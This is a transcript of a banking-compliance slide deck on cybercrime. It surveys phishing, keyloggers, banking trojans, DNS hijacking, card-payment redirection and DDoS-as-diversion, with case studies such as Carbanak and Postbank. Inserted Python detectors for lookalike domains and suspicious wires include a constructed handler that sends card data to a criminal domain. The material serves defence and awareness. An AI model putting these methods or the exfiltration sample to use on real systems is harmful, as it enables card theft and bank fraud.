
COUNTERING FINANCING TERRORISM C – D - E CASE STUDIES , SCENARIOS

COUNTERING CYBERCRIME CASE STUDIES , SCENARIOS ACCESS TO BANK ACCOUNTS , FRAUDULENT TRANSFERS , MOBILE & E –BANKING, FINANCIAL AND DATA INTRUSIONS, CYBER SECURITY BREACH. COUNTERING FINANCING TERRORISM C – D - E CASE STUDIES , SCENARIOS ACCESS TO BANK ACCOUNTS , FRAUDULENT TRANSFERS ,

sallyn

Presentation Transcript


  1. COUNTERING CYBERCRIME CASE STUDIES , SCENARIOS ACCESS TO BANK ACCOUNTS , FRAUDULENT TRANSFERS , MOBILE & E –BANKING, FINANCIAL AND DATA INTRUSIONS, CYBER SECURITY BREACH COUNTERING FINANCING TERRORISM C – D - E CASE STUDIES , SCENARIOS ACCESS TO BANK ACCOUNTS , FRAUDULENT TRANSFERS , MOBILE & E –BANKING, FINANCIAL AND DATA INTRUSIONS, CYBER SECURITY BREACH

  2. CYBER CRIME & SECURITY BREACHES • The global cyber security market is expected to skyrocket to 120.1 billion by 2017 from 63.7 billion in 2011. • The estimated annual cost of global cyber crime is 100 billion (cyber crime statistics and trends, infographic). • Victims per year: 556 million; per day: over 1.5 million; per second: 18. • Identities exposed: more than 232.3 million. • More than 600.000 Facebook accounts are exposed and compromised every day. aaziz@cl.com.lb

  3. MAJOR MOTIVATION BEHIND CYBER ATTACKS • CYBER CRIME 40% • HACKTIVISM 50% • CYBER WARFARE 3% • CYBER ESPIONAGE 7% • USE OF COMPUTER AND COMPUTER NETWORKS TO PROMOTE POLITICAL ENDS, HUMAN RIGHTS AND INFORMATION ETHICS

  4. THE GLOBAL ENVIRONMENT FOR CYBER CRIMINALITY • Russia & the United States are the largest contributors in malware attacks: • USA 19.7% • Russia 39,4% • The US Navy sees 110.000 cyber attacks every hour. • PricewaterhouseCoopers published a study of cyber attacks against enterprises and financial institutions: the number of attacks increased around 38% during 2014/2015. • France is the most targeted country, where cyber criminality has progressed around 51% (21 incidents per day) and the ratio of financial losses has increased around 28%, reaching 3,7 euros. (L’Orient-Le Jour, Friday 16 October 2015.)

  5. BANK FUND FRAUD CASES LOSS & RECOVERY • Difficulty for banks to hold on to hacked funds 22% • Ability to recover fraudulently transferred funds 10% • Reimbursements of losses caused to banks 37% • Loss caused to businesses 60% • Unrecoverable funds 68%

  6. COMMON TYPES OF CYBER ATTACKS • VIRUSES, MALWARE, WORMS, TROJANS 50% • CRIMINAL INSIDER 33% • THEFT OF DATA-BEARING DEVICES 28% • SQL INJECTION 28% • PHISHING 22% • WEB-BASED ATTACKS 17% • SOCIAL ENGINEERING 17% • BOTNETS have been using infected “zombie” computers to send out spam.

  7. QUESTIONS • Does the FI have a monitoring program for unusual and potentially suspicious activity that covers funds transfers and monetary instruments such as travelers checks, money orders, ...? • Does the FI have internal policies and procedural measures to apply enhanced compliance to MIPS (Mobile & Internet Payments Systems)? • Is the FI capable of monitoring the customers’ activity? • Does the FI enhance awareness of customer behavior when dealing with on-line banking products and services? • Does the bank recommend or require that customers adopt security measures on the devices used to perform on-line banking operations? Ex: purchase of anti-virus, usage of on-screen keyboards. • Does the bank create authenticators for customers dealing with on-line products and services?

  8. Financial Institutions’ responsibility • Banks provide support to regulatory authorities and law enforcement agents by securing their systems and protecting the customers’ database from potential data intrusions and data theft. • Banks ensure a proactive strategy against compliance breaches and against financial crime wrongdoers from an AML/CFT/Cybercrime perspective, by enhancing their Information Technology safeguards and security-focused internal policies and measures, along with adequately implemented security systems, in order to protect sound banking activity from any breach threatening the core banking system.

  9. Customers’ responsibility • Customers should be receiving awareness education towards cybercrime threats. • Customers should be involved in the process of securing their credentials , their data and the respect of financial data confidentiality. • Customers should not expose the FI to financial crime activities , nor expose the bank to vulnerabilities acting as weak links easily targeted and compromised by hackers and organized crime actors.

  10. RISK ASSESSMENT AND PREVENTION • Despite the simplicity of the scheme implemented, phishing attacks are still very aggressive and represent a serious problem for the banking system. The following are a few good practices to avoid the insidious threat: • Be wary of requests to confirm personal or financial information with high urgency. • Be wary of requests for quick action that threaten users with frightening information. • Take care with email and other online communication from unknown senders. • Verify online accounts regularly to ensure that no unauthorized transactions have been made. • Never divulge personal information via phone or on insecure websites (plain HTTP, TCP port 80). • Don’t click on links, download files, or open email attachments from unknown senders. • Beware of pop-ups. Never enter personal information in a pop-up screen, or click on it.

  11. WOLFSBERG GROUP guidance on mobile and internet payment services • Money laundering risks and mitigants of mobile and internet payment services (MIPS). • Prevents the use of the FI for criminal purposes. • The FATF definition of New Payment Methods (NPMs): reports dated 2006, 2010 and 2013. • Migration from paper-based payments to MIPS. • MIPS are powerful tools for the support of financial inclusion, e.g. distance is reduced. • More dynamic expansion of the market for products of this nature.

  12. HACKING METHODS Method 1: • Hacker sends an email to victim containing a picture or other document that victim is waiting for (this can be known through social engineering: knowing the information that others give you against themselves). • Victim opens the document, while in the background, a program is implanting the virus on the victim’s computer. • Hacker uses the virus to be able to control the victim’s computer and browse the data on it. The computer is now part of the hacker’s botnet (the network of computers that the hacker has access to).

  13. Method 2: • Hacker sends a link to victim asking them to “verify their account”. Hacker would be impersonating a security team (Facebook security team, Microsoft Security, etc.) • Victim goes to said website, which apparently looks identical to the original website. (the hacker has created a copy of the original website) • Victim types their usual username and password • Hacker receives Username and password • Many victims use the same password for everything. Hacker has now access to emails, Facebook accounts, and others.

  14. Method 3: • Hacker sends an email to victim containing a file they have been waiting for. • A Keylogger (Program that records keystrokes) is installed without the victim knowing. • Every 5 minutes, the keylogger sends all collected keystrokes to the hacker. • All the hacker has left to do, is find a combination of letters and numbers that would look like a username and a password. Hacker now knows everything about you and about your conversations with everyone.

  15. CASES

  16. CASE 1 • Hackers have stolen approximately $1 billion in what could be one of the largest bank heists ever, according to a new report from the Internet security firm Kaspersky Lab. • Kaspersky said it has uncovered how hackers surreptitiously installed spying software on bank computers, eventually learned how to mimic bank employee workflows and used the knowledge to make transfers into bank accounts they had created for this theft. • More than 100 banks were hit, and based on the hackers' practice of stealing between $2.5 million and $10 million from each bank, it estimated "total financial losses could be as high as $1 billion, making this by far the most successful criminal cyber campaign we have ever seen." • Kaspersky did not name the banks but said they are institutions located in 25 countries, including the United States.

  17. the "attacks remain active," and provided tips for bank officials to determine if their computers are vulnerable. • The thieves were Russian, Ukrainian, Chinese and European, Kaspersky said. • The individual thefts involved no more than $10 million apiece. • Kaspersky called the malware "Carbanak" and said it provided the hackers the ability to watch bank employees conduct their business. • "This allowed them to see and record everything that happened on the screens of staff who serviced the cash transfer systems," Kaspersky said. "In this way the fraudsters got to know every last detail of the bank clerks' work and were able to mimic staff activity in order to transfer money and cash out."

  18. After penetrating a bank's computer systems, the hackers lurked for "two to four months" before striking in one of several ways, like changing an account balance, then transferring the excess funds into their own accounts. They also spewed cash out of ATMs when "one of the gang's henchmen was waiting beside the machine" to collect the money. • An industry cybersecurity group has "disseminated intelligence on this attack to the members," according to The New York Times, which first covered the report. The Financial Services Information Sharing and Analysis Center told the Times that "some briefings were also provided by law enforcement entities."

  19. CASE 2 • SAN FRANCISCO — The Federal Reserve Bank of St. Louis confirmed on Tuesday that hackers had successfully attacked the bank, redirecting users of its online research services to fake websites set up by the attackers. • The breach was just the latest in a spate of hackings against government systems in recent months, affecting the White House, the State Department and even the president’s own email account. • In this case, the attack appeared to compromise the Internet’s routing system, known as the domain name system, or D.N.S. • In a statement, the St. Louis Fed informed those who use the bank’s public economic data and analysis tools that it discovered the breach far later. The bank said hackers compromised the domain name registrar, which sends traffic to the St. Louis Fed, and were able to redirect the bank’s web traffic to rogue sites.

  20. The fake websites were meant to mimic the web pages of services provided by the Federal Reserve Bank of St. Louis, including Federal Reserve Economic Data, or Fred, a database of economic data culled from over 70 sources, and the Federal Reserve Archival System for Economic Research, which includes historical data. The hackers also mimicked the bank’s data mapping service and a service that allows users to look at vintage displays of economic data. • “As is common with these kinds of D.N.S. attacks, users who were redirected to one of these phony websites may have been unknowingly exposed to vulnerabilities that the hackers may have put there, such as phishing, malware and access to user names and passwords,” the agency said in a statement. • The agency said the website of the St. Louis Fed had not been affected. The attack was first reported by Krebs on Security, a blog popular with security experts.

  21. A spokeswoman for the Federal Reserve Bank of St. Louis said that she did not yet know who was behind the attacks. The Federal Reserve had no comment about the attack. • Security experts say that domain name system (DNS) attacks require significantly more skill than a typical website attack. By attacking the domain name registrar used by the St. Louis Fed, it is possible that attackers may have been able to compromise the security for some or all of the sites that rely on the security of the domain name registrar. • According to records filed with Icann, the Internet Corporation for Assigned Names and Numbers, the St. Louis Fed’s domain name registrar is eNom Inc., which is part of Rightside, a company in Kirkland, Wash. According to the company’s website, Rightside has 16 million web domain names under management.

  22. Representatives for eNom and Rightside said they were aware of a “sophisticated attack,” but that they had “no evidence of customers’ personal information being accessed.” • Security experts said that the hackers could have gained valuable personal information from the attack. Attackers may have been able to glean email addresses and passwords from bankers and currency traders in the attack, for example, information that could be used for a more sophisticated attack on more valuable websites. • “Great way to phish the passwords and email addresses of bankers and currency traders,” said Dave Jevans, the chairman of the Anti-Phishing Working Group. “Since people reuse passwords, this is a ready font of juicy data to attack all users of the Fed’s data.”

  23. CASE 3 • Thieves are stealing money from people's credit cards, bank and PayPal accounts -- by first tapping into their Starbucks mobile app. • Starbucks (SBUX) acknowledged that criminals have been breaking into individual customer rewards accounts. • The Starbucks app lets you pay at checkout with your phone. It can also reload Starbucks gift cards by automatically drawing funds from your bank account, credit card or PayPal. • That's how criminals are siphoning money away from victims. They break into a victim's Starbucks account online, add a new gift card, transfer funds over -- and repeat the process every time the original card reloads. • These thefts were first reported by consumer journalist Bob Sullivan. • CNNMoney interviewed several Starbucks customers who in recent months have had this happen to them.

  24. It happened to Jean Obando on the Saturday evening of December 7. He had just stopped by a Starbucks in Sugar Land, Texas and paid with his phone app. Then while driving on the highway, his phone chimed with a barrage of alerts. PayPal repeatedly notified him that his Starbucks card was being automatically reloaded with $50. • Then came the email from Starbucks. • "Your eGift Just Made Someone's Day," the email said. "It's a great way to treat someone — whether it's to say Happy Birthday, Thank you or just 'this one's on me.'" • He got 10 more just like it -- in just five minutes. • Starbucks didn't stop a single transaction or pause to ask Obando for secondary approval. All of them went through.

  25. When Obando told Starbucks he thought his account was hijacked, Starbucks promised to conduct a review. When Obando asked to stop the payments and refund his money, Starbucks told him to dispute the charges with PayPal. • It took Obando two weeks to get back his $550. He said the incident made him realize Starbucks doesn't seek enough approval from customers before directly accessing their bank accounts. • Obando, who works in a Houston high school's technology department, said he disabled the app. • "Now, I just pay with my credit card or cash," he said. "I can't trust Starbucks with my payment information anymore." • Starbucks records obtained by CNNMoney show that all of those payments went to a card registered to the email address tranlejame3@yahoo.com. No one from that address has responded to questions. • Starbucks told CNNMoney the company has not been hacked, and it didn't lose customer data. The company said these account takeovers are likely due to weak customer passwords. Starbucks suggested that customers use unique, strong passwords.

  26. But Starbucks can do more on its end. Most respectable online services (like Gmail, Twitter and LinkedIn) let users enable two-step authentication, which sends a text message to your phone whenever you sign in from a new device. This added layer of security would have protected Starbucks customers, said Gavin Reid, an executive with cybersecurity firm Lancope. • Starbucks wouldn't say if it's adding new security measures to its system. But it promises customers will be reimbursed for any fraudulent charges. • This is the second time Starbucks' payment system runs into security issues. Last year someone discovered the Starbucks app left passwords vulnerable, because it was storing them in plain text. • Because this is an issue with account access, the only way for customers to protect themselves is to create a strong password -- and erase any payment methods attached to their Starbucks account. Disabling the auto-reload of money isn't enough. A criminal can just turn that back on.

  27. CASE 4 • Hackers Steal $6.7 Million in Cyber Bank Robbery. • The first major cybercrime of 2012 has taken place in South Africa, with hackers making off with about $6.7 million from Postbank, which is state-owned and part of the South African post office. • According to the Sunday Times, the hackers used stolen login details for a Postbank teller and a call center agent to transfer about $6.7 million into multiple bank accounts that were opened across the country late last year. • The hackers also made large cash withdrawals from ATMs in Gauteng, KwaZulu-Natal, and the Free State. Thanks to the stolen login details, the hackers were able to increase withdrawal limits and withdraw large amounts of money. • The robbery took place over three days, beginning on Jan. 1 a little after 9 a.m., and the last of the money was withdrawn from Postbank at 6:11 a.m. on Jan. 3. • Postbank told the Sunday Times that none of its four million customers were affected.

  28. As Infoworld's Ted Samson notes, a crime like this raises several questions: namely, how hackers were able to obtain a bank teller's and call center agent's credentials, and why such low-level employees had the ability to significantly increase withdrawal limits? • A senior IT and banking security expert told the Sunday Times that the Postbank network and security systems are "shocking and in desperate need of an overhaul" and that this type of theft was "always going to be a very real possibility." • Postbank spent nearly $2 million to upgrade its fraud detection system. • Even though we hear a lot about annoying (but somewhat harmless) hacks performed by Anonymous-like "hacktivists," it's important to remember that most hacking and illegal activity occurs on the Web to make money, not a statement.

  29. The improvement of online banking systems, and their increased use by consumers worldwide, has made this service a privileged target for cyber criminals. • What are the main methods used by cyber crime, and how have they evolved over the years? • We will analyze the most insidious cyber threats to online banking services, including phishing attacks, malware-based attacks and DDoS.

  30. PHISHING • The number of phishing attacks against banking systems is constantly growing. Practically every sector of society is targeted by cyber criminals with various techniques. Phishing attacks make large use of social engineering techniques to fool the user and steal sensitive information and banking account credentials. • In a typical phishing scheme, spoofed emails lead users to visit infected websites designed to appear as legitimate ones. The websites are designed to coax customers to divulge financial data, such as account credentials, social security numbers and credit card numbers. • In the classic attack scheme, fraudsters send e-mails or advertisements to the victims with content that looks like they were sent by a bank or by a credit card company. The emails request victims to click on a link to go to a website that replicates a bank’s website.

  31. The malicious email could contain a link to the fake website or could include an attachment that, once opened, performs exactly the same task. Phishing attacks use social engineering techniques mixed with technical tricks to fool the user and steal sensitive information and banking account credentials. Phishing messages usually take the form of fake notifications from banks, providers, e-payment systems and other organizations. They request the user to submit sensitive information such as passwords, credit card numbers and bank account details. • In the literature, there are several variants of phishing; many of them involve the use of malware specifically designed to steal credentials from victims while hiding evidence of an attack.

  32. Figure – Phishing attack

  33. Cyber crime involves increasingly sophisticated phishing attacks. The last edition of the APWG Global Phishing Survey report revealed that attackers increasingly target shared web hosting servers for use in fraudulent activities such as mass phishing attacks. • Phishers are concentrating their efforts on breaking into hosting providers with unprecedented success and abusing their resources to conduct large scale phishing

  34. Watering hole • “Watering hole” attacks are considered an evolution of spear phishing attacks. They consist of injecting malicious code onto the public web pages of a website that a small group of people usually visit. • In a “watering hole” attack scenario, the attackers wait for victims to visit the compromised site instead of inviting them with phishing messages. The efficiency of the method could be increased with exploitation of zero-day vulnerabilities in many large-use software programs such as Internet Explorer or Adobe Flash Player. • Cyber criminals could easily compromise an improperly configured or updated website using one of the numerous exploit kits available on the black market. Usually attackers hack the target site months before they actually use it for an attack. • The methods are very efficient. It’s very difficult to locate a compromised website. “Watering hole” is a considerably surgical attack that allows hackers to hit only a specific community; compared with classic phishing, it is less noisy.

  35. Another famous “watering hole” attack against the banking sector was observed in March 2013 when several South Korean banks were hit by a widespread attack that wiped data and shut down systems. Internet banking servers went down causing an interruption of their services, including online banking.

  36. Pharming and Credit Card Redirection • Pharming occurs when attackers are able to hijack a bank’s URL so that when users try to access their bank’s website, they get redirected to a fake site that looks like the real thing. • The term “pharming” is a neologism based on the words “farming” and “phishing.” Although it’s difficult to carry out, it’s technically possible with the following techniques:

  37. Credit card redirection is a new technique we’re seeing used on compromised e-commerce websites to steal credit and debit card information, by compromising legitimate web services (e.g. legitimate shopping websites). • Security experts note that websites implementing e-commerce services are under attack; the most frequently hit open source e-commerce system is Magento. In one case observed, the file used for payment handling was altered to replace every occurrence of paymentexpress.com with paymentiexpress.com, a domain managed by cyber criminals. • Credit cards are valuable in the underground market. An attacker modifies the flow of the payment process, so that instead of just processing the card, they redirect all payment details to a domain they manage, so they can steal card details. • The user that accesses the compromised e-commerce site is stealthily redirected to a well designed phishing site, so that the website can acquire card information and send it back to the attackers. • Redirection is also possible by modifying the credit card processing file, giving the criminals access to all transaction data, including credit card details (name, address, CC and CVV).
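A defender can catch the single-character substitution described on this slide by scanning payment-handling files for hostnames that are close to, but not the same as, the gateway domains the shop is supposed to use. The following is an added example, not part of the original presentation; the handler snippet, its URL paths and the function names are constructed for illustration, and only the two domain names come from the slide.

```python
import re

# Gateway domains the shop is expected to talk to. paymentexpress.com is the
# legitimate domain named on the slide; extend the set for your own processor.
TRUSTED_DOMAINS = {"paymentexpress.com"}

# Hostname-shaped tokens: dot-separated labels ending in an alphabetic TLD.
HOST_RE = re.compile(
    r"\b((?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,24})\b",
    re.IGNORECASE,
)


def registrable(host):
    """Naive registrable domain: the last two labels. Assumption: none of the
    trusted gateways sits under a multi-label suffix such as co.uk."""
    return ".".join(host.lower().split(".")[-2:])


def levenshtein(a, b):
    """Edit distance (insertions, deletions, substitutions) between a and b."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                # delete from a
                           cur[j - 1] + 1,             # insert into a
                           prev[j - 1] + (ca != cb)))  # substitute
        prev = cur
    return prev[-1]


def find_lookalikes(source, trusted=TRUSTED_DOMAINS, max_distance=2):
    """Return (line_no, host, trusted_domain, distance) for every hostname in
    `source` whose registrable domain is near a trusted one but not equal."""
    findings = []
    for line_no, line in enumerate(source.splitlines(), 1):
        for host in HOST_RE.findall(line):
            domain = registrable(host)
            if domain in trusted:
                continue  # exact match or subdomain of a trusted gateway
            for good in sorted(trusted):
                distance = levenshtein(domain, good)
                if distance <= max_distance:
                    findings.append((line_no, host.lower(), good, distance))
    return findings


# Constructed sample of a tampered payment handler (not real Magento code).
SAMPLE_HANDLER = """<?php
// constructed sample of a tampered payment handler
class Sample_Payment_Handler {
    const GATEWAY_URL = 'https://sec.paymentiexpress.com/submit';
    const STATUS_URL  = 'https://sec.paymentexpress.com/status';
    public function send($card) {
        return $this->post(self::GATEWAY_URL, $card);
    }
}
"""

if __name__ == "__main__":
    for line_no, host, good, distance in find_lookalikes(SAMPLE_HANDLER):
        print(f"line {line_no}: {host} is {distance} edit(s) from {good}")
```

Run it over the payment module on every deploy and alongside file-integrity monitoring, since an attacker who redirects to an unrelated domain would not be caught by a similarity check alone.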

  38. Malware-based attacks • Malware-based attacks are among the most dangerous cyber threats related to online banking services. The number of families of malicious code specifically designed for financial attacks is constantly increasing. Some of the most popular banking malware are Zeus, Carberp, SpyEye, Tinba and the recent KINS. But surely, the first three agents are considered to be the most by the security community. Zeus is the oldest of them. Numerous variants were detected during the last five years, and they have often been used to commit cyber fraud on a large scale. The first version of the Zeus trojan was detected in July 2007, when it was used to steal information from the United States Department of Transportation. • Almost every banking trojan presents a group of shared capabilities, including backdoor and credential stealing features, and form grabbing. The majority of this malware uses “Man In The Browser” attack methods.

  39. Man In The Browser • Financial service professionals consider “Man In The Browser” to be the greatest threat to online banking, and cybercrime increasingly uses it due to its efficiency. In the classic MITB scheme, attackers integrate social engineering methods with the use of malware that infects the browser of the victim’s client machine. It appears in the form of a BHO (Browser Helper Object), ActiveX control, browser extension, add-on, plugin, or API hooking. “Man In The Browser” attacks are based on the presence of proxy malware that infects the user’s browser, exploiting its vulnerabilities on the victim’s machine. The malicious code resides in the browser and is able to modify the content of a banking transaction or to conduct operations for victims in a completely covert fashion. The agent also hides transactions from victims, altering the content presented to the browser with injection techniques. It’s important to state that neither the bank nor the user can detect the attack. This holds even when a bank has implemented a multifactor authentication process, CAPTCHA, or any other form of challenge-response authentication.

  40. Mobile threats • Security researchers are observing the increasing interest of cybercriminals in new platforms, including cloud, mobile and social networking. The reason is the capability of these infrastructures to reach a wide audience, and the lack of awareness of cyber threats. • Mobile platforms, due to their high penetration level, are the technology most used to provide banking services. For that reason, they are a popular target for cyber crime. • When we speak about mobile, we cannot ignore that Android is the OS that has the greatest market share. • It’s evident that the cyber criminal black market is specializing its offer in malware that targets Android, exactly as for any desktop PC. In the underground market, it’s possible to acquire various exploit kits specifically designed for mobile devices that allow criminals to recruit machines for botnet architecture, or to organize prolific scams, typically premium SMS and click fraud. • The number of “highly specialized suppliers” who “provide commoditized malware services” is increasing. Popular malware such as Zeus, SpyEye and Citadel have been ported to mobile devices; ZitMo, SpitMo and CitMo are their respective mobile versions.

  41. In early 2013, RSA discovered traces of a new banking trojan named KINS. An announcement was found on the Russian black market. According to RSA experts, the KINS Trojan could have an impact on the banking ecosystem superior to SpyEye and Zeus. • On the other hand, banking has adopted even more sophisticated countermeasures to mitigate the risks, and to evaluate the level of security of their infrastructure. For example, all major UK banks will take part in the most extensive cyber threat exercise in two years, to test their ability to survive a sustained online attack against payment and market systems. • One of the most important ways to mitigate cyber attacks and data breaches is to share information about major incidents and cybercrime trends. Banks, law enforcement and intelligence agencies must cooperate to prevent further damage and mitigate cyber threats that are even more sophisticated. • SOURCE: INFOSEC INSTITUTE REPORTS

  42. CYBERCRIME AND TERRORISM DDoS attacks • Another insidious cyber threat for online banking services is DDoS attacks. Security experts and law enforcement warned the banking sector of a possible rise of DDoS attacks, both financially and politically motivated. In late 2012 and early 2013, the self-proclaimed Muslim hacktivist group Izz ad-Din al-Qassam Cyber Fighters conducted Operation Ababil. That caused the destruction of banking websites of the top US banks including U.S. Bancorp, JPMorgan Chase & Co, Bank of America, PNC Financial Services Group, and SunTrust Banks. • Security experts noted that the hackers adopted an anomalous strategy for DDoS attacks. Instead of using botnets, they hit targets using a network of volunteers that deliberately participated in the operations. While a classic botnet, although very efficient, is quite simple to detect due to the presence of anomalous traffic to and from the Command and Control servers, in this case the presence of volunteers complicates the mitigation of the attack. • The DHS and FBI have reportedly been liaising with cyber security officials in 129 other countries, and shared details of a total of 130,000 IP addresses that have been used in the attacks. The attacks have resulted in customers sometimes being unable to access online or mobile banking services, due to the extent of the attack.

  43. Main categories of DDoS attacks are: • Volume Based Attacks- The attacker tries to saturate the bandwidth of the target’s website by flooding it with a huge quantity of data. • Protocol Attacks- The attacker’s goal is to saturate the target servers’ resources or those of intermediate communication equipment (e.g., load balancers) by exploiting network protocol flaws. • Application Layer (Layer 7) Attacks- Designed to exhaust the resource limits of web services, application layer attacks target specific web applications, flooding them with a huge quantity of HTTP requests that saturate a target’s resources. • Major trends that DDoS mitigation solution providers are observing are: • Larger and larger network attacks- These large-scale attacks often use SYN flood and DNS amplification as their tools of choice. • Hit and Run attacks- These are smaller scale application layer attacks that don’t last very long, but occur every few days.

  44. In September 2012, the FBI, Financial Services Information Sharing and Analysis Center (FS-ISAC), and the Internet Crime Complaint Center (IC3) issued a joint alert about the diffusion of the Dirt Jumper crimeware kit, being used to DDoS attack banks in order to hide fraudulent transactions. • Cyber criminals used “low-powered” distributed denial-of-service (DDoS) attacks as a diversion strategy, while they operated fraudulent wire transfers. The losses to credit institutions amounted to several million dollars. • Once a DDoS is underway, hackers take over a payment switch (e.g. wire application), using an accredited privileged user account. That way, cyber criminals could control a master payment switch, and transfer as much money from as many accounts as they can get away with, until they’re discovered. • Once the credentials of multiple employees were obtained, cyber criminals were able to get privileged access rights on a wire payment switch and “handle all aspects of a wire transaction, including the approval.” The wire transfer amounts have varied between $400,000 and $900,000, and, in at least one case, the actors raised the wire transfer limit on the customer’s account, to allow for a larger transfer.
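The pattern on this slide (a limit raised on an account, a transfer above the old limit shortly afterwards, and one privileged account handling both initiation and approval, all while a DDoS is in progress) can be expressed as a correlation rule over the payment switch's audit trail. The same limit-raise check applies to the withdrawal-limit increases in Case 4. This is an added example, not part of the original presentation; the event fields, operator and account identifiers, dates and the 24-hour lookback are assumptions made for illustration.

```python
from datetime import datetime, timedelta


def ts(text):
    return datetime.strptime(text, "%Y-%m-%d %H:%M")


# Constructed audit events; field names are hypothetical, not a real schema.
EVENTS = [
    {"type": "limit_change", "time": ts("2024-01-15 10:02"), "account": "ACC-1001",
     "operator": "op17", "old_limit": 250_000, "new_limit": 1_000_000},
    {"type": "wire", "time": ts("2024-01-15 10:20"), "wire_id": "W-1",
     "account": "ACC-1001", "amount": 900_000,
     "initiated_by": "op17", "approved_by": "op17"},
    {"type": "wire", "time": ts("2024-01-15 10:30"), "wire_id": "W-3",
     "account": "ACC-3003", "amount": 400_000,
     "initiated_by": "op05", "approved_by": "op08"},
    {"type": "wire", "time": ts("2024-01-15 11:00"), "wire_id": "W-2",
     "account": "ACC-2002", "amount": 40_000,
     "initiated_by": "op03", "approved_by": "op09"},
]

# Constructed incident window reported by network operations.
DDOS_WINDOWS = [(ts("2024-01-15 10:00"), ts("2024-01-15 12:00"))]


def review_wires(events, ddos_windows=(), lookback=timedelta(hours=24)):
    """Return {wire_id: [reasons]} for wires that should be held for review.

    limit_raised_before_transfer: the amount exceeds the limit that applied
        before a raise made on the same account within `lookback`.
    self_approved: the same operator initiated and approved the wire.
    during_ddos_incident: added only to wires already flagged, so an ongoing
        DDoS raises priority without flagging every transfer made during it.
    """
    raises = {}   # account -> limit_change events that increased the limit
    alerts = {}
    for ev in sorted(events, key=lambda e: e["time"]):
        if ev["type"] == "limit_change":
            if ev["new_limit"] > ev["old_limit"]:
                raises.setdefault(ev["account"], []).append(ev)
            continue
        if ev["type"] != "wire":
            continue
        reasons = []
        for change in raises.get(ev["account"], []):
            recent = ev["time"] - change["time"] <= lookback
            if recent and ev["amount"] > change["old_limit"]:
                reasons.append("limit_raised_before_transfer")
                break
        if ev["initiated_by"] == ev["approved_by"]:
            reasons.append("self_approved")
        in_ddos = any(start <= ev["time"] <= end for start, end in ddos_windows)
        if reasons and in_ddos:
            reasons.append("during_ddos_incident")
        if reasons:
            alerts[ev["wire_id"]] = reasons
    return alerts


if __name__ == "__main__":
    for wire_id, reasons in review_wires(EVENTS, DDOS_WINDOWS).items():
        print(wire_id, "hold for review:", ", ".join(reasons))
```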

  45. CASES TAKEN FROM SIC WEBSITE Internet fraud / credit cards • The SIC received an STR from a local bank concerning a group of Lebanese nationals involved in organized crime in connection with internet fraud and theft of financial and credit card information. • The suspects, identified as mobile phone dealers, were apprehended by law enforcement authorities, and the SIC financial investigation underway identified bank accounts used by the suspects. The said accounts reflected multiple cash deposits and withdrawals in addition to wire transfers to a foreign beneficiary (claimed to be for internet-services commission). • The SIC decided to lift bank secrecy off the concerned bank accounts and forward its findings to the General Prosecutor.

  46. Credit Card Scam • The SIC was approached by the State Security Directorate (SSD) for assistance in a case involving three individuals implicated in the forgery of bank payment cards by means of copying financial data using a highly sophisticated device; two individuals were arrested on charges of forgery and theft, whereas investigations were underway to find a third fleeing person. • The SSD investigation revealed that the third person supplied the two arrested individuals with a credit card reader, and promised them a fee of USD 50 for each skimmed credit card. The scam resulted in 45 skimmed cards whose relevant information was emailed to the fleeing person residing in a foreign country. • While several STRs were received from concerned banks following complaints filed by their clients whose accounts witnessed withdrawals not executed by them, the legal representative of a renowned international card network announced initiation of legal proceedings against the concerned conspirators. • The SIC, on its part, requested assistance from a foreign counterpart concerning the third fleeing person. Information sought from local reporting entities on the accounts held directly or indirectly in the names of the concerned individuals revealed insignificant financial activity; subsequently, the SIC decided to lift banking secrecy off the concerned accounts and forwarded its findings to the General Prosecutor.
